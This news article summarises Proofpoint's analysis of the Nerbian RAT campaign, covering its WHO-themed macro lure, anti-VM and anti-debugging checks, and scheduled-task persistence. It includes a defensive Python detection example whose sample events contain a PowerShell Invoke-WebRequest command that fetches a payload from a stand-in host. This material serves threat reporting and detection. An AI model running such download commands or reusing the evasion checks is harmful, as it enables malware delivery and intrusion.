Researchers at cybersecurity vendor Proofpoint have analysed a new remote access Trojan (RAT) malware campaign using sophisticated evasion techniques and leveraging COVID-19 themed messaging to target global organisations.
The malware, dubbed “Nerbian RAT” and written in the Go programming language, uses significant anti-analysis and anti-reversing capabilities and open-source Go libraries to conduct malicious activities, the researchers stated.
The campaign was first analysed by Proofpoint in late April. In a statement, Proofpoint vice president of Threat Research and Detection, Sherrod DeGrippo, said the research demonstrates how malware authors continue to operate at the intersection of open-source capability and criminal opportunity.
Low-volume RAT malware spoofs WHO, leverages COVID-19 pandemic
Starting on April 26, 2022, Proofpoint researchers observed a low-volume malware campaign targeting multiple industries with emails claiming to be from the World Health Organisation (WHO) and sharing important information regarding COVID-19.
The emails included an attached Word document containing macros that, when opened, revealed information relating to COVID-19 safety, self-isolation, and caring for individuals.
“Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing the WHO to distribute information about the virus,” the researchers wrote. The documents also contain logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI), Proofpoint added.
Nerbian RAT demonstrates macro-enabled attack path, code re-use
When the macros are enabled, the document executes an embedded macro that drops a .bat file which performs a PowerShell Invoke-WebRequest (IWR) and renames the downloaded file to UpdateUAV.exe before writing it to the victim’s hard drive, the researchers said.
“UpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in Golang, 3.5MB in size, and UPX packed,” they wrote. “Likely, this malware is packed with UPX to reduce the overall size of the executable being downloaded. Unpacked, the file is 6.6MB in total.”
Proofpoint named this malware “Nerbian RAT” based on one of the function names in the dropper. Researchers noted that the UpdateUAV executable features significant code re-use, with strings referencing various GitHub projects.
Nerbian RAT’s sophisticated evasion techniques
Nerbian RAT demonstrates several sophisticated evasion techniques, Proofpoint said. For example, the dropper will stop execution upon encountering certain conditions, including if:
- The size of the hard disk on the system is less than 100GB.
- The name of the hard disk contains the strings virtual, vbox or vmware.
- The MAC address queried returns certain OUI values.
- Specific reverse engineering/debugging programs are present.
- exe, RAMMap.exe, RAMMap64.exe, or vmmap.exe memory analysis/memory tampering programs are present.
In addition to the anti-reversing checks, Proofpoint identified other anti-analysis checks present in the binary including:
- Use of the IsDebuggerPresent API to determine if the executable is being debugged.
- Queries for the following network interface names: Intel PRO/1000 MT Network Connection, Loopback Pseudo-Interface 1, and Software Loopback Interface 1.
Malware demonstrates ability to log keystrokes, communicates over SSL
If execution continues past these checks, the dropper will then attempt to create a scheduled task named MicrosoftMouseCoreWork that starts the RAT payload hourly, establishing persistence, Proofpoint said.
“The dropper’s end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled task to run it hourly as its primary persistence mechanism.”
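The infection chain described above (Word macro dropping a .bat, PowerShell Invoke-WebRequest fetching UpdateUAV.exe, and the hourly MicrosoftMouseCoreWork task running MoUsoCore.exe) gives defenders concrete hunting hooks. The following is an added example, not Proofpoint's code, that runs three simple detection rules over constructed, normalised process-creation and scheduled-task-creation events; the event field names, file paths and URL are assumptions for illustration.

```python
import re

# Constructed sample events in a normalised shape resembling Sysmon process
# creation and Windows Security 4698 (scheduled task created) records.
SAMPLE_EVENTS = [
    {"event": "process_create", "parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\x.bat"},
    {"event": "process_create", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest -Uri http://example.invalid/u "
                "-OutFile UpdateUAV.exe"},
    {"event": "task_create", "task_name": "MicrosoftMouseCoreWork",
     "task_command": r"C:\Users\u\AppData\Local\Temp\MoUsoCore.exe"},
    {"event": "process_create", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe"},
    {"event": "task_create", "task_name": "NightlyBackup",
     "task_command": r"C:\Tools\backup.exe"},
]

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SHELLS = {"cmd.exe", "powershell.exe"}
NERBIAN_TASK = "MicrosoftMouseCoreWork"          # task name from the report
NERBIAN_FILES = ("updateuav.exe", "mousocore.exe")  # file names from the report
IWR_RE = re.compile(r"invoke-webrequest|\biwr\b", re.IGNORECASE)


def detect(events):
    """Return (rule_name, event) pairs for events matching the Nerbian chain."""
    hits = []
    for e in events:
        if e["event"] == "process_create":
            parent, image = e["parent"].upper(), e["image"].lower()
            cmd = e["cmdline"].lower()
            # Rule 1: an Office application spawning a shell (macro execution path).
            if parent in OFFICE_APPS and image in SHELLS:
                hits.append(("office_spawns_shell", e))
            # Rule 2: PowerShell web download; stronger if a known payload name appears.
            if image == "powershell.exe" and IWR_RE.search(cmd):
                known = any(name in cmd for name in NERBIAN_FILES)
                hits.append(("powershell_iwr_known_payload" if known
                             else "powershell_iwr", e))
        elif e["event"] == "task_create":
            # Rule 3: the reported task name or payload name in a scheduled task.
            task_cmd = e["task_command"].lower()
            if e["task_name"] == NERBIAN_TASK or any(n in task_cmd for n in NERBIAN_FILES):
                hits.append(("nerbian_persistence_task", e))
    return hits


if __name__ == "__main__":
    for rule, event in detect(SAMPLE_EVENTS):
        print(rule, "<-", event)
```

Rules 1 and 2 are generic to macro-based droppers and will fire on other campaigns; rule 3 is specific to the indicators Proofpoint published.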
Nerbian RAT also appears to have a variety of functions, including the ability to log keystrokes, and, like most modern malware families, it prefers to handle its communications over SSL, Proofpoint continued.
“Despite all this complexity and care being taken to protect the data in transit and ‘vet’ the compromised host, the dropper and the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued isn’t necessarily for obfuscation, but to simply reduce the size of the executable,” Proofpoint researchers concluded.
“Additionally, much of the functionality of both the RAT and the dropper are easy to infer due to the strings referring to GitHub repositories.”